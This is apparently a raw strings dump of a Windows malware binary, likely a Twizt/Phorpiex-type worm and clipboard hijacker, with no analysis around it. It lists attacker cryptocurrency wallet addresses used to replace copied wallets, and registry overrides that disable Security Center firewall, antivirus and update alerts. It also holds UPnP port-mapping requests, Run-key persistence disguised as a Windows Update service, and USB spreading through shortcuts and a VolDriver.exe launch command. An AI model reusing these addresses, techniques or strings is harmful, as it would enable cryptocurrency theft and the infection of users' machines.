!This program cannot be run in DOS mode.
`.rdata
@.data
>ilciu1
>ilciuo
L$$QRP
;PCOIu^
>ilciu
F(;F$s
VC20XC00U
;t$(v(
UQPXY]Y[
HTTP/1.1 200 OK
LOCATION:
239.255.255.250
M-SEARCH * HTTP/1.1
ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1
Man:"ssdp:discover"
HOST: 239.255.255.250:1900
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Content-Type: text/xml; charset="utf-8"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"/></SOAP-ENV:Body></SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
<NewInternalPort>%d</NewInternalPort>
<NewInternalClient>%s</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:DeletePortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost>%s</NewRemoteHost>
<NewExternalPort>%d</NewExternalPort>
<NewProtocol>%s</NewProtocol>
</m:DeletePortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
TCP: P2P_SendGETLPacket(0,%s) failed!
twizt)
twizt)
twizt)
twizt)
www.update.microsoft.com
s405940
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
14673222387840093601L
12gcwY6q4pv4DBbEjeQXwbhDBesLDc755VE2kyzzXRtvBvzd
18xjALsLW57DQcXSgvGE8H9iXkXYvPjSWc
3PLk48rqFRT7ZB2GZVHMJE5aiHr5jjBfZcw
39t2ndtRZKxHPHaprbe6kPaws4vs1nWA94
qz9vrpv9h2j5e6fsqwwsh8e9aaumwvql956ynh9rs9
XmgkLqGXu8HGU7tTbbwWvaJYrgvybx3eZE
DSVC6eMqTCpkaMkCVp6Yn2U7FYkU76VhKB
0xd4F8DfD1cDBa76e9ac6b3b31Ef3C6C6c3D1ea1d0
LXz2Jhi73bna54msz2zpsEpRVAh8KbeYRL
rPTusqR9SMoh7QuYfJ3EJF7Ewogp6HVJEt
TCW3T7UyyN3MWqakTPViWVRAL1kGsYyTL6
t1gE3Hz4ivvEAQMWagv5XuUMkUPcnNkuNGB
tz1U9d1x7U3AEMw8UPSVMtEH4u9eShBX6prG
hxd697fe63e8c4d138cd47d9cdbff6bbf6facbd1fb
QQeW6TaSKUA9yuG2mPKMd6epoXa6vnRqh6
RRqRTmr9WDk2LdTn7mfMHXofz1XaoTrG3C
NBGLRULGKDFPLIDQZRDQOORKONAV5VRWOV3CDGJW
AUpwoQdnjVynLKhDkNt1TJh6sgduJnxyJy
SNjNq8EbkPcfEqQtE6FTM5eftqS33otZY4
zil1afs50sm4fe7ulsdygvvl7x6tygtcwmkrqtzqlq
s1iibbBPLCP843XGjxRxoT9Skk542HMLU5v
bitcoincash:qz9vrpv9h2j5e6fsqwwsh8e9aaumwvql956ynh9rs9
cosmos1j2j4n8mn2al28g62uzsrf9jhhqjsdpr58et5j4
46wi3NQz8eWV9HnGGKtpqKFcyGqWvLXsRP9C4oh3FgJ8M11QzmSrWWu6hW2kdredmQDYFjkJNg8t4Lye6vPuRcCsK71DPYr
addr1qx6957p39d7v53mvqe7gqc62eazsmmxhlth870590x9v8mq0pjv9yx5jd4sgndnt87zmdutq87r8xh0m8pn65k2p9yasl4vamq
Fd8ScFbi4ZnkrDYZa2Fhanx3BuoWXFzDaG
GAWB6FUMRQBOF4JSVWAH6GO26C24UL5P44G3LDWK46WMFAS2TAZD7EBC
GLnwYTx21SBA1XAsBqtFumkDMpB97tmqsp
bnb1yzw7m55vrhqmmw2e0xpven8q49u8m63prv3hhz
band1ecl9c2w2dtxx70pewvsl6le3sd8srrlg36vthx
bc1q4eym03072yk0zahdm9jym28vk0dxwyvs57sr6g
U30212907
E30940134
B30912949
WS2_32.dll
StrStrW
PathFileExistsW
StrCmpNW
PathMatchSpecW
PathFindFileNameW
StrChrA
StrStrIA
StrCmpNIA
SHLWAPI.dll
URLDownloadToFileW
urlmon.dll
InternetConnectA
InternetCrackUrlA
InternetReadFile
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
InternetOpenW
InternetOpenUrlW
WININET.dll
isalpha
isdigit
memmove
NtQuerySystemTime
RtlTimeToSecondsSince1980
mbstowcs
ntdll.dll
_vscprintf
msvcrt.dll
lstrlenA
GlobalLock
GetModuleHandleW
GetTickCount
GlobalAlloc
lstrcpynW
ExitThread
MultiByteToWideChar
lstrlenW
GlobalUnlock
GetFileSize
MapViewOfFile
UnmapViewOfFile
WriteFile
InitializeCriticalSection
LeaveCriticalSection
CreateFileW
FlushFileBuffers
EnterCriticalSection
CreateFileMappingW
CloseHandle
FindFirstFileW
GetDriveTypeW
MoveFileExW
CreateDirectoryW
GetLogicalDrives
CopyFileW
GetModuleFileNameW
lstrcmpW
FindClose
RemoveDirectoryW
QueryDosDeviceW
lstrcmpiW
FindNextFileW
GetDiskFreeSpaceExW
DeleteFileW
lstrcpyW
SetFileAttributesW
GetVolumeInformationW
ExitProcess
CreateEventA
GetLastError
CreateMutexA
CreateThread
ExpandEnvironmentStringsW
HeapReAlloc
HeapAlloc
HeapFree
HeapCreate
HeapValidate
GetProcessHeaps
HeapSetInformation
GetCurrentProcessId
InterlockedDecrement
WaitForSingleObject
InterlockedExchange
InterlockedIncrement
InterlockedExchangeAdd
GetCurrentProcess
GetCurrentThread
SetThreadPriority
GetThreadPriority
DeleteCriticalSection
DuplicateHandle
GetLocaleInfoA
CreateProcessW
KERNEL32.dll
SetClipboardViewer
SetClipboardData
OpenClipboard
DispatchMessageA
CreateWindowExW
RegisterRawInputDevices
DefWindowProcA
SetWindowLongW
ChangeClipboardChain
EmptyClipboard
GetClipboardData
GetWindowLongW
RegisterClassExW
TranslateMessage
wsprintfW
SendMessageA
IsClipboardFormatAvailable
CloseClipboard
GetMessageA
wvsprintfA
USER32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
RegSetValueExA
RegOpenKeyExA
RegSetValueExW
CryptAcquireContextW
CryptReleaseContext
CryptGenRandom
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitialize
CoUninitialize
CoInitializeEx
ole32.dll
OLEAUT32.dll
WSAWaitForMultipleEvents
WSASocketA
WSACreateEvent
WSAGetOverlappedResult
WSAEventSelect
WSAEnumNetworkEvents
WSASend
WSARecv
WSACloseEvent
SetEvent
CreateIoCompletionPort
GetQueuedCompletionStatus
PostQueuedCompletionStatus
GetSystemInfo
memset
_aullshr
_allshl
memcpy
_chkstk
_aulldiv
RtlUnwind
NtQueryVirtualMemory
wLI"Q/}
.FKiY&
?__H%P*
N'eNRa
'<+Z]vo, ;
V]Pk''9
0123456789abcdef
Sep 28 2021 10:36:37
0123456789
0123456789abcdef
Sep 28 2021 10:36:36
jjjjjj
%temp%
%s\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
%s:Zone.Identifier
%s\%d.exe
%s:Zone.Identifier
service
serviceType
serviceList
device
deviceType
deviceList
urn:schemas-upnp-org:device:InternetGatewayDevice:1
urn:schemas-upnp-org:device:WANDevice:1
urn:schemas-upnp-org:device:WANConnectionDevice:1
GetExternalIPAddressResponse
urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1
controlURL
URLBase
NewExternalIPAddress
wsecsvcmgr.exe
Microsoft Windows Update Service
%s:Zone.Identifier
%userprofile%
wsecsvcmgr.exe
%windir%
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
%s\nodesinfo.dat
%s\cmdinfo.dat
Microsoft Corporation
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
/c start .\%s & start .\%s\VolDriver.exe
%windir%\system32\cmd.exe
%s.lnk
%s\%s\VolDriver.exe
shell32.dll
shell32.dll
Thumbs.db
$RECYCLE.BIN
desktop.ini
System Volume Information
%s\%s\%s
(%dGB)
Unnamed volume
bitcoincash:
cosmos
bitcoincash:
vbitcoincash
cosmos